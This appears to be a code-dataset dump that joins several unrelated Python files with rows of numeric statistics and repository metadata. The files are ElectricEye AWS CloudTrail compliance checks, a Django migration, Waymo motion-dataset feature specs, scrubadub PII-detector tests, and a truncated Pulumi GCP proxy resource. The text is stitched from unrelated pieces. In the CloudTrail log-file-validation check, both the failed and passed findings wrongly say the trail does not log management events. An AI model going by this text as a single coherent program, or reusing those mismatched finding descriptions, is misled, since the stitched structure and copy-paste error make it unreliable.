"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
print(e)
@registry.register_check("cloudtrail")
def cloudtrail_global_services_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudTrail.4] CloudTrail trails should log management events"""
trail = list_trails(cache=cache)
myCloudTrails = trail["Trails"]
for trails in myCloudTrails:
trailArn = str(trails["TrailARN"])
trailName = str(trails["Name"])
response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
for details in response["trailList"]:
globalServiceEventCheck = str(details["IncludeGlobalServiceEvents"])
if globalServiceEventCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-global-services-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[CloudTrail.4] CloudTrail trails should log management events",
"Description": "CloudTrail trail "
+ trailName
+ " does not log management events. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your trail should log management events refer to the Management Events section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-events-with-cloudtrail.html#logging-management-events",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-global-services-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudTrail.4] CloudTrail trails should log management events",
"Description": "CloudTrail trail " + trailName + " logs management events.",
"Remediation": {
"Recommendation": {
"Text": "If your trail should log management events refer to the Management Events section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-events-with-cloudtrail.html#logging-management-events",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("cloudtrail")
def cloudtrail_log_file_validation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudTrail.5] CloudTrail log file validation should be enabled"""
trail = list_trails(cache=cache)
myCloudTrails = trail["Trails"]
for trails in myCloudTrails:
trailArn = str(trails["TrailARN"])
trailName = str(trails["Name"])
response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
for details in response["trailList"]:
fileValidationCheck = str(details["LogFileValidationEnabled"])
if fileValidationCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-log-file-validation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[CloudTrail.5] CloudTrail log file validation should be enabled",
"Description": "CloudTrail trail "
+ trailName
+ " does not log management events. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your trail should have log file validation enabled refer to the Validating CloudTrail Log File Integrity section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-6",
"NIST SP 800-53 SC-16",
"NIST SP 800-53 SI-7",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.2.1",
"ISO 27001:2013 A.12.5.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
"ISO 27001:2013 A.14.2.4",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-log-file-validation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudTrail.5] CloudTrail log file validation should be enabled",
"Description": "CloudTrail trail "
+ trailName
+ " does not log management events. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your trail should have log file validation enabled refer to the Validating CloudTrail Log File Integrity section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-6",
"NIST SP 800-53 SC-16",
"NIST SP 800-53 SI-7",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.2.1",
"ISO 27001:2013 A.12.5.1",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
"ISO 27001:2013 A.14.2.4",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding | 53.217463 | 211 | 0.457295 | 2,520 | 32,303 | 5.848413 | 0.109921 | 0.018727 | 0.028091 | 0.034333 | 0.904533 | 0.903379 | 0.899511 | 0.896865 | 0.891573 | 0.881327 | 0 | 0.049113 | 0.441538 | 32,303 | 607 | 212 | 53.217463 | 0.767738 | 0.037489 | 0 | 0.835664 | 0 | 0.031469 | 0.371393 | 0.042966 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01049 | false | 0.008741 | 0.005245 | 0 | 0.019231 | 0.003497 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9efb260f4986302b07bc61037b1cfedb118be7dc | 1,428 | py | Python | PhotoHub/Hub/migrations/0004_alter_customer_email_alter_customer_phone_and_more.py | akrhythm20/clickPhoto | 461735d750f4339e2f75d389dec98f0e7dc636c6 | [
"MIT"
] | null | null | null | PhotoHub/Hub/migrations/0004_alter_customer_email_alter_customer_phone_and_more.py | akrhythm20/clickPhoto | 461735d750f4339e2f75d389dec98f0e7dc636c6 | [
"MIT"
] | null | null | null | PhotoHub/Hub/migrations/0004_alter_customer_email_alter_customer_phone_and_more.py | akrhythm20/clickPhoto | 461735d750f4339e2f75d389dec98f0e7dc636c6 | [
"MIT"
] | 2 | 2022-01-26T15:15:16.000Z | 2022-01-28T13:17:06.000Z | # Generated by Django 4.0.1 on 2022-01-28 20:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Hub', '0003_delete_omniuser'),
]
operations = [
migrations.AlterField(
model_name='customer',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AlterField(
model_name='customer',
name='phone',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='customer',
name='pincode',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='photographer',
name='dob',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='photographer',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AlterField(
model_name='photographer',
name='phone',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='photographer',
name='pincode',
field=models.IntegerField(blank=True, null=True),
),
]
| 29.142857 | 75 | 0.557423 | 132 | 1,428 | 5.94697 | 0.333333 | 0.178344 | 0.22293 | 0.258599 | 0.782166 | 0.782166 | 0.735032 | 0.735032 | 0.699363 | 0.625478 | 0 | 0.02588 | 0.323529 | 1,428 | 48 | 76 | 29.75 | 0.786749 | 0.031513 | 0 | 0.785714 | 1 | 0 | 0.095583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02381 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b48a4b3d6c2cc415edc555eadd09b1fbb2c058c3 | 6,720 | py | Python | interaction_prediction/DataPrep/raw_features.py | david9dragon9/AIR | cbcb7cb74f4280596ede9d998f75f20c272843bd | [
"Apache-2.0"
] | 16 | 2021-06-20T17:01:46.000Z | 2021-12-16T19:04:42.000Z | interaction_prediction/DataPrep/raw_features.py | david9dragon9/AIR | cbcb7cb74f4280596ede9d998f75f20c272843bd | [
"Apache-2.0"
] | 1 | 2022-03-03T08:49:40.000Z | 2022-03-04T03:24:09.000Z | interaction_prediction/DataPrep/raw_features.py | david9dragon9/AIR | cbcb7cb74f4280596ede9d998f75f20c272843bd | [
"Apache-2.0"
] | 4 | 2021-08-18T13:36:42.000Z | 2022-03-04T06:03:44.000Z | import math
import os
import uuid
import time
from matplotlib import cm
import matplotlib.animation as animation
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import HTML
import itertools
import tensorflow as tf
from google.protobuf import text_format
from waymo_open_dataset.metrics.ops import py_metrics_ops
from waymo_open_dataset.metrics.python import config_util_py as config_util
from waymo_open_dataset.protos import motion_metrics_pb2
scenario_features = {
'scenario/id':
tf.io.FixedLenFeature([1], tf.string, default_value = None)
}
# Example field definition
roadgraph_features = {
'roadgraph_samples/dir':
tf.io.FixedLenFeature([20000, 3], tf.float32, default_value=None),
'roadgraph_samples/id':
tf.io.FixedLenFeature([20000, 1], tf.int64, default_value=None),
'roadgraph_samples/type':
tf.io.FixedLenFeature([20000, 1], tf.int64, default_value=None),
'roadgraph_samples/valid':
tf.io.FixedLenFeature([20000, 1], tf.int64, default_value=None),
'roadgraph_samples/xyz':
tf.io.FixedLenFeature([20000, 3], tf.float32, default_value=None),
}
# Features of other agents.
state_features = {
'state/id':
tf.io.FixedLenFeature([128], tf.float32, default_value=None),
'state/type':
tf.io.FixedLenFeature([128], tf.float32, default_value=None),
'state/is_sdc':
tf.io.FixedLenFeature([128], tf.int64, default_value=None),
'state/tracks_to_predict':
tf.io.FixedLenFeature([128], tf.int64, default_value=None),
'state/current/bbox_yaw':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/height':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/length':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/timestamp_micros':
tf.io.FixedLenFeature([128, 1], tf.int64, default_value=None),
'state/current/valid':
tf.io.FixedLenFeature([128, 1], tf.int64, default_value=None),
'state/current/vel_yaw':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/velocity_x':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/velocity_y':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/width':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/x':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/y':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/current/z':
tf.io.FixedLenFeature([128, 1], tf.float32, default_value=None),
'state/future/bbox_yaw':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/height':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/length':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/timestamp_micros':
tf.io.FixedLenFeature([128, 80], tf.int64, default_value=None),
'state/future/valid':
tf.io.FixedLenFeature([128, 80], tf.int64, default_value=None),
'state/future/vel_yaw':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/velocity_x':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/velocity_y':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/width':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/x':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/y':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/future/z':
tf.io.FixedLenFeature([128, 80], tf.float32, default_value=None),
'state/past/bbox_yaw':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/height':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/length':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/timestamp_micros':
tf.io.FixedLenFeature([128, 10], tf.int64, default_value=None),
'state/past/valid':
tf.io.FixedLenFeature([128, 10], tf.int64, default_value=None),
'state/past/vel_yaw':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/velocity_x':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/velocity_y':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/width':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/x':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/y':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/past/z':
tf.io.FixedLenFeature([128, 10], tf.float32, default_value=None),
'state/objects_of_interest':
tf.io.FixedLenFeature([128,], tf.int64, default_value=None)
}
traffic_light_features = {
'traffic_light_state/current/state':
tf.io.FixedLenFeature([1, 16], tf.int64, default_value=None),
'traffic_light_state/current/valid':
tf.io.FixedLenFeature([1, 16], tf.int64, default_value=None),
'traffic_light_state/current/x':
tf.io.FixedLenFeature([1, 16], tf.float32, default_value=None),
'traffic_light_state/current/y':
tf.io.FixedLenFeature([1, 16], tf.float32, default_value=None),
'traffic_light_state/current/z':
tf.io.FixedLenFeature([1, 16], tf.float32, default_value=None),
'traffic_light_state/current/id':
tf.io.FixedLenFeature([1, 16], tf.int64, default_value=None),
'traffic_light_state/past/state':
tf.io.FixedLenFeature([10, 16], tf.int64, default_value=None),
'traffic_light_state/past/valid':
tf.io.FixedLenFeature([10, 16], tf.int64, default_value=None),
'traffic_light_state/past/x':
tf.io.FixedLenFeature([10, 16], tf.float32, default_value=None),
'traffic_light_state/past/y':
tf.io.FixedLenFeature([10, 16], tf.float32, default_value=None),
'traffic_light_state/past/z':
tf.io.FixedLenFeature([10, 16], tf.float32, default_value=None),
}
features_description = {}
features_description.update(scenario_features)
features_description.update(roadgraph_features)
features_description.update(state_features)
features_description.update(traffic_light_features) | 43.636364 | 75 | 0.690476 | 898 | 6,720 | 5.017817 | 0.103563 | 0.051487 | 0.244563 | 0.200178 | 0.832889 | 0.799379 | 0.774967 | 0.768531 | 0.768531 | 0.758544 | 0 | 0.06499 | 0.159673 | 6,720 | 154 | 76 | 43.636364 | 0.732956 | 0.00744 | 0 | 0.388889 | 0 | 0 | 0.180114 | 0.111278 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.104167 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
81ed3472035af98d2d4c818c80e5903160b470cc | 7,981 | py | Python | tests/test_detector_known.py | datascopeanalytics/scrubadub | ab199f0b3cc3ca11f646aabb05ebe124d2757ea5 | [
"Apache-2.0"
] | 190 | 2015-12-03T01:31:36.000Z | 2020-09-02T23:46:38.000Z | tests/test_detector_known.py | vishalbelsare/scrubadub | ab199f0b3cc3ca11f646aabb05ebe124d2757ea5 | [
"Apache-2.0"
] | 54 | 2020-09-10T14:46:14.000Z | 2022-03-10T06:03:00.000Z | tests/test_detector_known.py | datascopeanalytics/scrubadub | ab199f0b3cc3ca11f646aabb05ebe124d2757ea5 | [
"Apache-2.0"
] | 57 | 2016-04-04T18:37:38.000Z | 2020-08-18T22:59:03.000Z | import unittest
import scrubadub
class PredefinedTestCase(unittest.TestCase):
def test_simple(self):
"""test a simple matching"""
test_str = 'this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'test', 'filth_type': 'test'},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(matches[0].beg, 10)
self.assertEqual(matches[0].end, 14)
def test_ignore_case(self):
"""test a matching, ignoring case"""
test_str = 'this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'Test', 'filth_type': 'test', 'ignore_case': True},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(10, matches[0].beg)
self.assertEqual(14, matches[0].end)
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'Test', 'filth_type': 'test', 'ignore_case': False},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(0, len(matches))
def test_ignore_whitespace(self):
"""test a matching, ignoring whitespace"""
test_str = 'this\n is\t a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'this is a \n\n\ntest', 'filth_type': 'test', 'ignore_whitespace': True},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(1, len(matches))
self.assertEqual(0, matches[0].beg)
self.assertEqual(17, matches[0].end)
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'this is a \n\n\ntest', 'filth_type': 'test', 'ignore_whitespace': False},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(0, len(matches))
def test_ignore_partial_match(self):
"""test a matching, ignoring whitespace"""
test_str = 'this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'is', 'filth_type': 'test', 'ignore_partial_word_matches': True},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(1, len(matches))
self.assertEqual(5, matches[0].beg)
self.assertEqual(7, matches[0].end)
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'is', 'filth_type': 'test', 'ignore_partial_word_matches': False},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(2, len(matches))
self.assertEqual(2, matches[0].beg)
self.assertEqual(4, matches[0].end)
self.assertEqual(5, matches[1].beg)
self.assertEqual(7, matches[1].end)
def test_empty(self):
"""test a simple matching"""
test_str = 'this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([])
matches = list(detector.iter_filth(test_str))
self.assertEqual(len(matches), 0)
def test_wrong_types(self):
with self.assertRaises(ValueError):
scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 1234, 'filth_type': 'test', 'ignore_case': True},
])
with self.assertRaises(ValueError):
scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': '1234', 'filth_type': 1234, 'ignore_case': True},
])
with self.assertRaises(ValueError):
scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': '1234', 'filth_type': '1234', 'match_end': 1234, 'ignore_case': True},
])
def test_start_end(self):
"""text matches with a start and end"""
test_str = 'hello this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'this is', 'match_end': 'test', 'filth_type': 'test'},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(matches[0].beg, 6)
self.assertEqual(matches[0].end, 20)
def test_word_boundaires(self):
"""test that word boundaries work as expected"""
test_str = 'hello this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'is', 'filth_type': 'test', 'ignore_partial_word_matches': False},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(matches[0].beg, 8)
self.assertEqual(matches[0].end, 10)
self.assertEqual(matches[1].beg, 11)
self.assertEqual(matches[1].end, 13)
self.assertEqual(len(matches), 2)
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'is', 'filth_type': 'test', 'ignore_partial_word_matches': True},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(matches[0].beg, 11)
self.assertEqual(matches[0].end, 13)
self.assertEqual(len(matches), 1)
def test_text_case(self):
"""test that word boundaries work as expected"""
test_str = 'hello this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'This', 'filth_type': 'test', 'ignore_case': True},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(matches[0].beg, 6)
self.assertEqual(matches[0].end, 10)
self.assertEqual(len(matches), 1)
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'This', 'filth_type': 'test', 'ignore_case': False},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(len(matches), 0)
def test_start_no_end(self):
"""text matches with a start and an invalid end"""
test_str = 'hello this is a test string'
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'this is', 'match_end': 'impossible to find', 'filth_type': 'test'},
])
matches = list(detector.iter_filth(test_str))
self.assertEqual(len(matches), 0)
def test_error(self):
"""text exceptions thrown by predefined"""
with self.assertRaises(KeyError):
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'non_existiant': 'this is'},
])
with self.assertRaises(KeyError):
detector = scrubadub.detectors.TaggedEvaluationFilthDetector([
{'match': 'the match', 'filth_type': 'email', 'non_existiant': 'this is'},
])
def test_filth_string(self):
filth = scrubadub.filth.TaggedEvaluationFilth(beg=0, end=5)
self.assertEqual(str(filth), "<TaggedEvaluationFilth text='' beg=0 end=5>")
filth = scrubadub.filth.TaggedEvaluationFilth(beg=0, end=5, text='hello')
self.assertEqual(str(filth), "<TaggedEvaluationFilth text='hello' beg=0 end=5>")
filth = scrubadub.filth.TaggedEvaluationFilth(beg=0, end=5, text='hello', document_name='hello.txt')
self.assertEqual(str(filth), "<TaggedEvaluationFilth text='hello' document_name='hello.txt' beg=0 end=5>")
filth = scrubadub.filth.TaggedEvaluationFilth(beg=0, end=5, text='hello', comparison_type='greeting')
self.assertEqual(str(filth), "<TaggedEvaluationFilth text='hello' beg=0 end=5 comparison_type='greeting'>")
filth = scrubadub.filth.TaggedEvaluationFilth(beg=0, end=5, text='hello', document_name='hello.txt',
comparison_type='greeting')
self.assertEqual(
str(filth),
"<TaggedEvaluationFilth text='hello' document_name='hello.txt' beg=0 end=5 comparison_type='greeting'>"
)
| 39.315271 | 115 | 0.62511 | 866 | 7,981 | 5.632794 | 0.10739 | 0.116851 | 0.183067 | 0.181222 | 0.903034 | 0.851579 | 0.828618 | 0.819598 | 0.743952 | 0.727347 | 0 | 0.018317 | 0.240697 | 7,981 | 202 | 116 | 39.509901 | 0.786634 | 0.044105 | 0 | 0.551724 | 0 | 0.006897 | 0.17696 | 0.042491 | 0 | 0 | 0 | 0 | 0.296552 | 1 | 0.082759 | false | 0 | 0.013793 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c3011f28859ac027aa8b40af92e7ad222b0bf9fa | 26,364 | py | Python | sdk/python/pulumi_gcp/compute/target_http_proxy.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/compute/target_http_proxy.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/compute/target_http_proxy.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['TargetHttpProxyArgs', 'TargetHttpProxy']
@pulumi.input_type
class TargetHttpProxyArgs:
def __init__(__self__, *,
url_map: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_bind: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a TargetHttpProxy resource.
:param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
pulumi.set(__self__, "url_map", url_map)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if proxy_bind is not None:
pulumi.set(__self__, "proxy_bind", proxy_bind)
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> pulumi.Input[str]:
"""
A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
"""
return pulumi.get(self, "url_map")
@url_map.setter
def url_map(self, value: pulumi.Input[str]):
pulumi.set(self, "url_map", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="proxyBind")
def proxy_bind(self) -> Optional[pulumi.Input[bool]]:
"""
This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
return pulumi.get(self, "proxy_bind")
@proxy_bind.setter
def proxy_bind(self, value: Optional[pulumi.Input[bool]]):
